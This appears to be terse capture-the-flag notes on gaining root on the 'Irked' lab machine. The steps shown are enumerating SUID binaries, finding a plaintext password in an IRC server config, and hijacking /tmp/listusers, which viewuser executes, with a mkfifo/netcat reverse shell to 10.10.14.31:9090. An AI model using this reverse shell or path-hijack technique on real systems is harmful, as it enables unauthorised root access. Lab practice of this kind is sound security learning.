4 box enum
PEAS
-rwsr-xr-x 1 root root 7.2K May 16 2018 /usr/bin/viewuser (Unknown SUID binary)
ircd@irked:~$ grep -rnw /home/ircd -ie password --color=always 2>/dev/null
/home/ircd/Unreal3.2/unrealircd.conf:695: password moocowsrulemyworld;
[~] Custom SUID Binaries (Interesting Stuff)
------------------------------
/usr/lib/spice-gtk/spice-client-glib-usb-acl-helper
/usr/bin/procmail
/usr/bin/X
/usr/bin/viewuser
ircd@irked:/tmp$ strings /usr/bin/viewuser
sh: 1: /tmp/listusers: not found
ircd@irked:~$ echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 10.10.14.31 9090 >/tmp/f' > listusers
ircd@irked:~$ chmod 777 listusers
/usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0 2021-06-06 16:41 (:0)
rm: cannot remove â/tmp/fâ: No such file or directory
$ rlwrap nc -lvnp 9090
listening on [any] 9090 ...
connect to [10.10.14.31] from (UNKNOWN) [10.10.10.117] 42960
whoami;id
root
uid=0(root) gid=1001(ircd) groups=1001(ircd)
Last updated